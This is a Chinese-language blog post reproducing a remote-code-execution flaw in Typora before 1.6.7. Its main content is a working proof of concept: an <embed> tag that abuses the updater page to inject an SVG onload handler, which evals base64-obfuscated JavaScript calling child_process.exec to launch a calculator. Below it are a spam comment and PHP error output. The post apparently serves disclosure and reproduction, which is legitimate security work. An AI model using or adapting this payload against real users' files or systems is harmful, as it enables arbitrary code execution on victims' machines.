概述
Typora是一款编辑器。(废话)
Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以在Typora主窗口中加载JavaScript代码。
影响版本
- Typora < 1.6.7
漏洞复现
- 首先安装在上述版本的Typora软件本体
- 演示视频
- 漏洞代码
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
Comments 1 条评论
博主 pornhub bahis siteleri
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 371
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 371
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 372
Warning: Trying to access array offset on value of type null in /www/wwwroot/justicelee.top/wp-content/themes/Sakurairo/functions.php on line 372
yandanxvurulmus.z1Ij5sWpcyaV